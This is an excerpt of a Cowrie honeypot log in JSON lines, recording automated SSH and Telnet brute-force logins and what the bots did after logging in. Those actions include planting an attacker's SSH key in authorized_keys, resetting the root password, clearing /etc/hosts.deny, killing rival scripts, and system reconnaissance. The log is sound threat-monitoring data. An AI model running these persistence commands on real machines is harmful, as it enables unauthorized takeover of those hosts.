6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T23:02:23.448036Z","src_ip":"212.227.125.160","session":"6c50574eac5f"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:02:23.785265Z","src_ip":"212.227.125.160","session":"6c50574eac5f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T23:02:23.898298Z","session":"6c50574eac5f"}
{"eventid":"cowrie.session.connect","src_ip":"59.24.162.196","src_port":35202,"dst_ip":"1.2.3.4","dst_port":23,"session":"84d573890e81","protocol":"telnet","message":"New connection: 59.24.162.196:35202 (1.2.3.4:23) [session: 84d573890e81]","sensor":"my-vps","timestamp":"2025-08-26T23:02:31.606431Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37338,"dst_ip":"1.2.3.4","dst_port":23,"session":"0e5d15792837","protocol":"telnet","message":"New connection: 212.227.235.229:37338 (1.2.3.4:23) [session: 0e5d15792837]","sensor":"my-vps","timestamp":"2025-08-26T23:02:46.963767Z"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":36322,"dst_ip":"1.2.3.4","dst_port":22,"session":"89cdedcaeb1e","protocol":"ssh","message":"New connection: 106.12.128.104:36322 (1.2.3.4:22) [session: 89cdedcaeb1e]","sensor":"my-vps","timestamp":"2025-08-26T23:02:54.388957Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:02:54.389840Z","src_ip":"106.12.128.104","session":"89cdedcaeb1e"}
{"eventid":"cowrie.session.closed","duration":30.510586977005005,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:03:02.117058Z","src_ip":"59.24.162.196","session":"84d573890e81"}
{"eventid":"cowrie.session.closed","duration":34.033180952072144,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:03:20.996887Z","src_ip":"212.227.235.229","session":"0e5d15792837"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57336,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7d0186b1334","protocol":"ssh","message":"New connection: 212.227.235.229:57336 (1.2.3.4:22) [session: d7d0186b1334]","sensor":"my-vps","timestamp":"2025-08-26T23:03:21.180835Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:03:22.203366Z","src_ip":"212.227.235.229","session":"d7d0186b1334"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:03:22.383968Z","src_ip":"212.227.235.229","session":"d7d0186b1334"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"qwerty","message":"login attempt [odoo/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-26T23:03:25.802505Z","src_ip":"212.227.235.229","session":"d7d0186b1334"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:03:27.910105Z","src_ip":"212.227.235.229","session":"d7d0186b1334"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:03:33.335890Z","src_ip":"212.227.125.160","session":"6c50574eac5f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45783,"dst_ip":"1.2.3.4","dst_port":22,"session":"9abe111a47f2","protocol":"ssh","message":"New connection: 212.227.235.229:45783 (1.2.3.4:22) [session: 9abe111a47f2]","sensor":"my-vps","timestamp":"2025-08-26T23:03:56.425248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:03:56.426592Z","src_ip":"212.227.235.229","session":"9abe111a47f2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T23:03:56.596179Z","src_ip":"212.227.235.229","session":"9abe111a47f2"}
{"eventid":"cowrie.login.success","username":"root","password":"1qw23er45t","message":"login attempt [root/1qw23er45t] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:03:57.257506Z","src_ip":"212.227.235.229","session":"9abe111a47f2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:03:57.653265Z","src_ip":"212.227.235.229","session":"9abe111a47f2"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T23:03:57.654092Z","src_ip":"212.227.235.229","session":"9abe111a47f2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:03:57.821601Z","src_ip":"212.227.235.229","session":"9abe111a47f2"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:03:57.822926Z","src_ip":"212.227.235.229","session":"9abe111a47f2"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":39094,"dst_ip":"1.2.3.4","dst_port":22,"session":"977e25883963","protocol":"ssh","message":"New connection: 106.12.128.104:39094 (1.2.3.4:22) [session: 977e25883963]","sensor":"my-vps","timestamp":"2025-08-26T23:04:47.854257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:04:47.855271Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:04:48.064619Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rdSISCART","message":"login attempt [root/P@ssw0rdSISCART] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:04:48.943937Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:04:50.368442Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T23:04:50.369137Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T23:04:50.370197Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:04:50.580856Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:04:51.467557Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T23:04:51.468317Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T23:04:51.679848Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:04:51.680949Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:04:54.392793Z","src_ip":"106.12.128.104","session":"89cdedcaeb1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59244,"dst_ip":"1.2.3.4","dst_port":23,"session":"fc9804d775fb","protocol":"telnet","message":"New connection: 212.227.125.160:59244 (1.2.3.4:23) [session: fc9804d775fb]","sensor":"my-vps","timestamp":"2025-08-26T23:04:57.393943Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:05:03.956599Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T23:05:03.957323Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:05:04.168444Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:05:08.087521Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.command.input","input":"echo \"root:P2o6OSBXwvZX\"|chpasswd|bash","message":"CMD: echo \"root:P2o6OSBXwvZX\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T23:05:08.088253Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1060811e2d0ee9ab77a807fd0198f0bb90a9e101e0246d74f7f93d1c8e10ad23","size":21,"shasum":"1060811e2d0ee9ab77a807fd0198f0bb90a9e101e0246d74f7f93d1c8e10ad23","duplicate":false,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/1060811e2d0ee9ab77a807fd0198f0bb90a9e101e0246d74f7f93d1c8e10ad23 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:05:09.366502Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:05:10.449852Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T23:05:10.450512Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T23:05:10.663264Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:05:10.664260Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:05:11.184565Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T23:05:11.185372Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:05:11.397141Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.session.closed","duration":46.12523078918457,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:05:43.519065Z","src_ip":"212.227.125.160","session":"fc9804d775fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41284,"dst_ip":"1.2.3.4","dst_port":22,"session":"d050083e05f8","protocol":"ssh","message":"New connection: 212.227.235.229:41284 (1.2.3.4:22) [session: d050083e05f8]","sensor":"my-vps","timestamp":"2025-08-26T23:05:46.770806Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:05:47.795948Z","src_ip":"212.227.235.229","session":"d050083e05f8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:05:47.797194Z","src_ip":"212.227.235.229","session":"d050083e05f8"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"wasd","message":"login attempt [odoo/wasd] failed","sensor":"my-vps","timestamp":"2025-08-26T23:05:51.707266Z","src_ip":"212.227.235.229","session":"d050083e05f8"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:05:53.549640Z","src_ip":"212.227.235.229","session":"d050083e05f8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:06:07.800332Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T23:06:07.800978Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:06:08.011374Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:06:08.457725Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T23:06:08.458636Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:06:08.669914Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:06:09.210707Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T23:06:09.211396Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:06:09.422873Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.session.closed","duration":"81.6","message":"Connection lost after 81.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:06:09.424128Z","src_ip":"106.12.128.104","session":"977e25883963"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":45710,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e9268c8b778","protocol":"ssh","message":"New connection: 106.12.128.104:45710 (1.2.3.4:22) [session: 8e9268c8b778]","sensor":"my-vps","timestamp":"2025-08-26T23:06:50.526783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:06:50.527487Z","src_ip":"106.12.128.104","session":"8e9268c8b778"}
